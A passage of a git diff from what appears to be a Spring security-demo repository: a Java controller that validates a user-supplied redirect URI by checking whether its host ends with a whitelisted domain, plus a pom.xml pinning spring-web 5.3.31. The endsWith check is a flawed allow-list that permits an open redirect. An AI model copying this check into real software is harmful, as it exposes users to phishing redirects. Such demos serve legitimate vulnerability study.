System.out.printf("schema:%s\n", schema); + System.out.printf("host:%s\n", host); + System.out.printf("path:%s\n", path); + + boolean pass = false; + for (String whiteDomain : whiteDomains) { + if (host.endsWith(whiteDomain)) { + pass = true; + break; + } + } + if (!pass) return "error"; + + return "redirect:" + redirectUri; + } +} diff --git a/spring/spring-uricomponentsbuilder/pom.xml b/spring/spring-uricomponentsbuilder/pom.xml index c5fb0b4c..53b8b853 100644 --- a/spring/spring-uricomponentsbuilder/pom.xml +++ b/spring/spring-uricomponentsbuilder/pom.xml @@ -5,7 +5,7 @@ org.springframework.boot spring-boot-starter-parent - 2.3.5.RELEASE + 2.7.18 4.0.0 @@ -22,6 +22,12 @@ org.springframework.boot spring-boot-starter-web + + + org.springframework + spring-web + 5.3.31 + \ No newline at end of file